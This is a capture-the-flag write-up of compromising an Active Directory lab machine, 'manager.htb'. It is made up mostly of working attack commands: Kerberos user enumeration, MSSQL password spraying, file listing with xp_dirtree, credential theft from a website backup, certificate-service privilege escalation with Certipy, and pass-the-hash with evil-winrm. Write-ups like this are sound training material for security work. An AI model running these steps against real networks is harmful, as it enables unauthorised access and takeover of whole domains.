Initial Access
First of all, we start with an Nmap TCP scan to discover which ports are open
nmap -sC -sV -Pn <target ip>
The Nmap scan revealed numerous open ports. Initially, I attempted manual enumeration of the website (source code, Gobuster, etc.), but since it is a static website, I didn’t find anything interesting
We can see that this is an Active Directory machine, so I added manager.htb and dc01.manager.htb to my /etc/hosts file
Kerberos is open, let’s see if we can enumerate some users with the tool Kerbrute
kerbrute userenum -d manager.htb --dc <target ip> /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames-dup.txt
We discovered new usernames! Let’s put them in a file named user.txt
So now we have a list of usernames. I tried more Kerberos attacks, but nothing worked. From the Nmap scan, we can see MSSQL is open on port 1433. Let’s see if we can do something.
Doing some research, I discovered that Metasploit has a module to crack MSSQL passwords
I will use auxiliary/scanner/mssql/mssql_login
use auxiliary/scanner/mssql/mssql_login
set rhosts <target ip>
set user_file user.txt
set USER_AS_PASS true
set USE_WINDOWS_AUTHENT true
set verbose false
exploit
We see that the user operator is using operator as password
Let’s now connect to the MSSQL db, we can use the Impackets tool mssqlclient.py
impacket-mssqlclient -port 1433 manager/operator:operator@<target ip> -windows-auth
I found a useful command on StackOverflow related to xp_dirtree. This command will enable us to search within local directories
Let’s try out this command
EXEC MASTER.sys.xp_dirtree 'C:\', 1, 1
Indeed, it works! We can successfully see the contents of the C:\ directory. Now it’s time for enumeration
After enumeration, I found that the folder C:/inetpub/wwwroot contains a website backup zip file
EXEC MASTER.sys.xp_dirtree 'C:\inetpub\wwwroot\', 1, 1
Because it is in the web folder, we can download it with wget from our attacker machine
wget http://<target ip>/website-backup-27-07-23-old.zip
Let’s see if we can find juicy information. I’ll create a folder named website to unzip the content of the zip folder
mkdir website
unzip website-backup-27.07.23-old.zip
With ls -la, we can see that there’s a file named .old-conf.xml. This seems interesting
cat .old-conf.xml
We found the user raven and the password R4v3nBe5tD3veloP3r!123
We can connect with evil-winrm and get the user
evil-winrm -i <target ip> -u raven -p 'R4v3nBe5tD3veloP3r!123'
Privilege Escalation
I always start my post-exploitation with some manual enumerations
Let’s get started, first I will enumerate groups
whoami /groups
We can see that user Raven is in the Certificate Service DCOM Access group
A quick research certificate service dcom exploit lead me to this Hacktricks post
In the article, there are a couple of methods listed. We need to find the right one
To do so we can use the tools Certipy and BloodHound
First, we will use the Certipy command that you can find in the Hacktricks post. Do not forget to use old-bloodhound, otherwise, it will not be compatible with the current version of BloodHound
certipy find -u raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123' -dc-ip <target ip>
This will generate a JSON file that we can read. The file is very big, so we can use grep to filter out esc and have a better view
cat 20231024130019_Certipy.json | grep "ESC"
Great! Now we know which attack we need to do for privilege escalation
We will use attack 2 from the HacktTricks method. There’s a timer, so you need to execute all of these commands very quickly for it to work. I suggest typing all of these commands beforehand. If you don’t, the last command will fail
This will be all my commands
certipy ca -u raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123' -dc-ip <target ip> -ca 'manager-DC01-CA' -add-officer 'raven'
certipy req -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123' -ca 'manager-DC01-CA' -target dc01.manager.htb -template SubCA -upn administrator@manager.htb
certipy ca -ca 'manager-DC01-CA' -issue-request 13 -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123'
certipy req -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123' -ca 'manager-DC01-CA' -target dc01.manager.htb -retrieve 13
certipy auth -pfx "administrator.pfx" -dc-ip <target ip> -username 'administrator' -domain 'manager.htb'
In the screenshot you can see that I got an error KDC_ERR_PADATA_TYPE_NOSUPP(KDC has no support for padata type) if you get this error or you didn’t made the commands fast so you have a clock error, you need to do as following:
sudo ntpdate -s manager.htb
certipy req -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123' -ca 'manager-DC01-CA' -target dc01.manager.htb -retrieve 13
certipy auth -pfx "administrator.pfx" -dc-ip <target ip> -username 'administrator' -domain 'manager.htb'
Now that we have the administrator hashes, we can do the pass the hash attack with evil-winrm
evil-winrm -i <target ip> -u administrator -H <administrator hash>